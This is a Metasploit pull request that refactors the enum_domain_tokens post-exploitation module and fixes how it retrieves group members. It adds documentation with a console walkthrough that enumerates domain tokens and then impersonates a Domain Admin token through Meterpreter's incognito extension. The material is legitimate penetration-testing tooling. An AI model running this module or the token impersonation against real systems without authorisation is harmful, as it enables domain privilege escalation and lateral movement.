### PR TITLE
enum_domain_tokens: Cleanup and fix group member retrieval

### DIFF
--- a/documentation/modules/post/windows/gather/enum_domain_tokens.md
+++ b/documentation/modules/post/windows/gather/enum_domain_tokens.md
@@ -1,0 +1,83 @@
+## Vulnerable Application
+
+This module enumerates domain account tokens, processes running under
+domain accounts, and domain users in the local Administrators, Users
+and Backup Operator groups.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a Windows target on a domain
+1. Do: `use post/windows/gather/enum_domain_tokens`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should receive a list of Active Directory domain accounts with impersonation tokens
+
+## Options
+
+## Scenarios
+
+### Local Administrator session on Windows Server 2016
+
+```
+msf6 > use post/windows/gather/enum_domain_tokens
+msf6 post(windows/gather/enum_domain_tokens) > set session 1
+session => 1
+msf6 post(windows/gather/enum_domain_tokens) > run
+
+[*] Running module against WIN-7V3NGVNQTJ1 (192.168.200.215)
+[+] Current session is running under a Local Admin account
+[*] This host is not a domain controller
+[*] Checking local groups for Domain Accounts and Groups
+
+Account in Local Groups with Domain Context
+===========================================
+
+ Local Group       Member              Domain Admin
+ -----------       ------              ------------
+ Administrators    CORP\Domain Admins  false
+ Backup Operators  CORP\asdf           false
+ Users             CORP\Domain Users   false
+
+
+[*] Checking for processes running under domain user
+
+Processes under Domain Context
+==============================
+
+ Process Name  PID   Arch  User            Domain Admin
+ ------------  ---   ----  ----            ------------
+ cmd.exe       3504  x64   CORP\corpadmin  true
+ conhost.exe   4008  x64   CORP\corpadmin  true
+
+
+[*] Checking for Domain group and user tokens
+
+Impersonation Tokens with Domain Context
+========================================
+
+ Token Type  Account Type  Account Name                                 Domain Admin
+ ----------  ------------  ------------                                 ------------
+ Delegation  User          CORP\corpadmin                               true
+ Delegation  Group         CORP\Denied RODC Password Replication Group  false
+ Delegation  Group         CORP\Domain Users                            false
+
+
+[*] Post module execution completed
+msf6 post(windows/gather/enum_domain_tokens) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN-7V3NGVNQTJ1\Administrator
+meterpreter > load incognito
+Loading extension incognito...Success.
+meterpreter > impersonate_token CORP\\corpadmin
+[-] Warning: Not currently running as SYSTEM, not all tokens will be available
+             Call rev2self if primary process token is SYSTEM
+[+] Delegation token available
+[+] Successfully impersonated user CORP\corpadmin
+meterpreter > getuid
+Server username: CORP\corpadmin
+meterpreter >
+```

--- a/modules/post/windows/gather/enum_domain_tokens.rb
+++ b/modules/post/windows/gather/enum_domain_tokens.rb
@@ -4,8 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Post
-  include Msf::Post::File
-  include Msf::Post::Windows::Accounts
+  include Msf::Post::Windows::Priv
 
   def initialize(info = {})
     super(
@@ -13,18 +12,19 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'Windows Gather Enumerate Domain Tokens',
         'Description' => %q{
-          This module will enumerate tokens present on a system that are part of the
-          domain the target host is part of, will also enumerate users in the local
-          Administrators, Users and Backup Operator groups to identify Domain members.
-          Processes will be also enumerated and checked if they are running under a
-          Domain account, on all checks the accounts, processes and tokens will be
-          checked if they are part of the Domain Admin group of the domain the machine
-          is a member of.
+          This module enumerates domain account tokens, processes running under
+          domain accounts, and domain users in the local Administrators, Users
+          and Backup Operator groups.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform' => [ 'win'],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -37,188 +37,177 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  # Run Method for when run command is issued
   def run
-    print_status("Running module against #{sysinfo['Computer']}") if !sysinfo.nil?
-    domain = primary_domain
+    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
+    print_status("Running module against #{hostname} (#{session.session_host})")
 
-    if !domain.empty?
-      uid = client.sys.config.getuid
-      dom_admins = get_members_from_group("Domain Admins")
+    domain = get_domain_name
 
-      if uid =~ /#{domain}/
-        user = uid.split("\\")[1]
-        if dom_admins.include?(user)
-          print_good("Current session is running under a Domain Admin Account")
-        end
-      end
+    fail_with(Failure::Unknown, 'Could not retrieve domain name. Is the host part of a domain?') unless domain
 
-      unless domain_controller?
-        list_group_members(domain, dom_admins)
-      end
+    @domain_admins = get_members_from_group('Domain Admins', domain) || []
 
-      list_tokens(domain, dom_admins)
-      list_processes(domain, dom_admins)
+    print_error("Could not retrieve '#{domain}\\Domain Admins' group members.") if @domain_admins.blank?
+
+    netbios_domain_name = domain.split('.').first.upcase
+
+    uid = client.sys.config.getuid
+    if uid.starts_with?(netbios_domain_name)
+      user = uid.split('\\')[1]
+      print_good('Current session is running under a Domain Admin account') if @domain_admins.include?(user)
     end
-  end
 
-  # Gets the Domain Name
-  def primary_domain
-    dom_info = get_domain("DomainControllerName")
-    if !dom_info.nil? && dom_info =~ /\./
-      foo = dom_info.split('.')
-      domain = foo[1].upcase
+    if domain_controller?
+      if is_system?
+        print_good('Current session is running as SYSTEM on a domain controller')
+      elsif is_admin?
+        print_good('Current session is running under a Local Admin account on a domain controller')
+      else
+        print_status('This host is a domain controller')
+      end
     else
-      print_error("Error parsing output from the registry. (#{dom_info})")
+      if is_system?
+        print_good('Current session is running as SYSTEM')
+      elsif is_admin?
+        print_good('Current session is running under a Local Admin account')
+      end
+      print_status('This host is not a domain controller')
+
+      list_group_members(netbios_domain_name)
     end
-    return domain
+
+    list_processes(netbios_domain_name)
+    list_tokens(netbios_domain_name)
   end
 
-  # List Tokens precent on the domain
-  def list_tokens(domain, dom_admins)
+  def list_group_members(domain)
     tbl = Rex::Text::Table.new(
-      'Header' => "Impersonation Tokens with Domain Context",
+      'Header' => 'Account in Local Groups with Domain Context',
       'Indent' => 1,
       'Columns' =>
       [
-        "Token Type",
-        "Account Type",
-        "Name",
-        "Domain Admin"
+        'Local Group',
+        'Member',
+        'Domain Admin'
       ]
     )
-    print_status("Checking for Domain group and user tokens")
-    client.core.use("incognito")
-    user_tokens = client.incognito.incognito_list_tokens(0)
-    user_delegation = user_tokens["delegation"].split("\n")
-    user_impersonation = user_tokens["impersonation"].split("\n")
 
-    group_tokens = client.incognito.incognito_list_tokens(1)
-    group_delegation = group_tokens["delegation"].split("\n")
-    group_impersonation = group_tokens["impersonation"].split("\n")
+    print_status('Checking local groups for Domain Accounts and Groups')
+
+    [
+      'Administrators',
+      'Backup Operators',
+      'Users'
+    ].each do |group|
+      group_users = get_members_from_localgroup(group)
+
+      next unless group_users
+
+      vprint_status("Group '#{group}' members: #{group_users.join(', ')}")
+
+      group_users.each do |group_user|
+        next unless group_user.include?(domain)
+
+        user = group_user.split('\\')[1]
+        tbl << [group, group_user, @domain_admins.include?(user)]
+      end
+    end
+
+    print_line("\n#{tbl}\n")
+  end
+
+  def list_tokens(domain)
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Impersonation Tokens with Domain Context',
+      'Indent' => 1,
+      'Columns' =>
+      [
+        'Token Type',
+        'Account Type',
+        'Account Name',
+        'Domain Admin'
+      ]
+    )
+    print_status('Checking for Domain group and user tokens')
+
+    user_tokens = client.incognito.incognito_list_tokens(0)
+    user_delegation = user_tokens['delegation'].split("\n")
+    user_impersonation = user_tokens['impersonation'].split("\n")
 
     user_delegation.each do |dt|
-      next unless dt =~ /#{domain}/
+      next unless dt.include?(domain)
 
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Delegation", "User", dt, true]
-      else
-        tbl << ["Delegation", "User", dt, false]
-      end
+      user = dt.split('\\')[1]
+      tbl << ['Delegation', 'User', dt, @domain_admins.include?(user)]
     end
 
     user_impersonation.each do |dt|
-      next unless dt =~ /#{domain}/
+      next if dt == 'No tokens available'
+      next unless dt.include?(domain)
 
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Impersonation", "User", dt, true]
-      else
-        tbl << ["Impersonation", "User", dt, false]
-      end
+      user = dt.split('\\')[1]
+      tbl << ['Impersonation', 'User', dt, @domain_admins.include?(user)]
     end
 
-    group_delegation.each do |dt|
-      next unless dt =~ /#{domain}/
+    group_tokens = client.incognito.incognito_list_tokens(1)
+    group_delegation = group_tokens['delegation'].split("\n")
+    group_impersonation = group_tokens['impersonation'].split("\n")
 
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Delegation", "Group", dt, true]
-      else
-        tbl << ["Delegation", "Group", dt, false]
-      end
+    group_delegation.each do |dt|
+      next unless dt.include?(domain)
+
+      user = dt.split('\\')[1]
+      tbl << ['Delegation', 'Group', dt, @domain_admins.include?(user)]
     end
 
     group_impersonation.each do |dt|
-      next unless dt =~ /#{domain}/
+      next if dt == 'No tokens available'
+      next unless dt.include?(domain)
 
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Impersonation", "Group", dt, true]
-      else
-        tbl << ["Impersonation", "Group", dt, false]
-      end
+      user = dt.split('\\')[1]
+      tbl << ['Impersonation', 'Group', dt, @domain_admins.include?(user)]
     end
-    results = tbl.to_s
-    print_line("\n" + results + "\n")
+
+    if tbl.rows.empty?
+      print_status('No domain tokens available')
+      return
+    end
+
+    print_line("\n#{tbl}\n")
   end
 
-  def list_group_members(domain, dom_admins)
+  def list_processes(domain)
     tbl = Rex::Text::Table.new(
-      'Header' => "Account in Local Groups with Domain Context",
+      'Header' => 'Processes under Domain Context',
       'Indent' => 1,
       'Columns' =>
       [
-        "Group",
-        "Member",
-        "Domain Admin"
+        'Process Name',
+        'PID',
+        'Arch',
+        'User',
+        'Domain Admin'
       ]
     )
-    print_status("Checking local groups for Domain Accounts and Groups")
-    admins = get_members_from_localgroup("Administrators")
-    users = get_members_from_localgroup("users")
-    backops = get_members_from_localgroup("\"Backup Operators\"")
-    admins.each do |dt|
-      next unless dt =~ /#{domain}/
-
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Administrators", dt, true]
-      else
-        tbl << ["Administrators", dt, false]
-      end
-    end
-
-    backops.each do |dt|
-      next unless dt =~ /#{domain}/
-
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Backup Operators", dt, true]
-      else
-        tbl << ["Backup Operators", dt, false]
-      end
-    end
-    users.each do |dt|
-      next unless dt =~ /#{domain}/
-
-      user = dt.split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << ["Users", dt, true]
-      else
-        tbl << ["Users", dt, false]
-      end
-    end
-    results = tbl.to_s
-    print_line("\n" + results + "\n")
-  end
-
-  def list_processes(domain, dom_admins)
-    tbl = Rex::Text::Table.new(
-      'Header' => "Processes under Domain Context",
-      'Indent' => 1,
-      'Columns' =>
-      [
-        "Name",
-        "PID",
-        "Arch",
-        "User",
-        "Domain Admin"
-      ]
-    )
-    print_status("Checking for processes running under domain user")
+    print_status('Checking for processes running under domain user')
     client.sys.process.processes.each do |p|
-      next unless p['user'] =~ /#{domain}/
+      next unless p['user'].include?(domain)
 
-      user = p['user'].split("\\")[1]
-      if dom_admins.include?(user)
-        tbl << [p['name'], p['pid'], p['arch'], p['user'], true]
-      else
-        tbl << [p['name'], p['pid'], p['arch'], p['user'], false]
-      end
+      user = p['user'].split('\\')[1]
+      tbl << [
+        p['name'],
+        p['pid'],
+        p['arch'],
+        p['user'],
+        @domain_admins.include?(user)
+      ]
     end
-    results = tbl.to_s
-    print_line("\n" + results + "\n")
+
+    if tbl.rows.empty?
+      print_status('No processes running as domain users')
+      return
+    end
+
+    print_line("\n#{tbl}\n")
   end
 end


### PR DESCRIPTION
Note: This requires #16952 to be merged first.

---

Resolves Rubocop violations.

Adds `Notes` module meta information.

Use new `get_domain_name` method introduced in #16952.

Print status message stating that nothing was found instead of printing empty tables.

Print `Could not retrieve domain name. Is the host part of a domain?` if the domain name cannot be found, instead of failing silently.

Fixed a bug where a call to `get_members_from_localgroup` incorrectly quoted the `Backup Operators` group name, preventing retrieval of `Backup Operators` group members.

https://github.com/rapid7/metasploit-framework/blob/b87348267bd5f60a157b08dcb877ee218a0a454c/modules/post/windows/gather/enum_domain_tokens.rb#L161

Fixed a bug where `get_members_from_group('Domain Admins')` was called without providing the domain name. This prevented retrieval of `Domain Admins` group members (unless the module was run on a domain controller).

https://github.com/rapid7/metasploit-framework/blob/b87348267bd5f60a157b08dcb877ee218a0a454c/modules/post/windows/gather/enum_domain_tokens.rb#L47

... + probably fixed a bunch of other things. The original module code was hard to read and has been refactored.
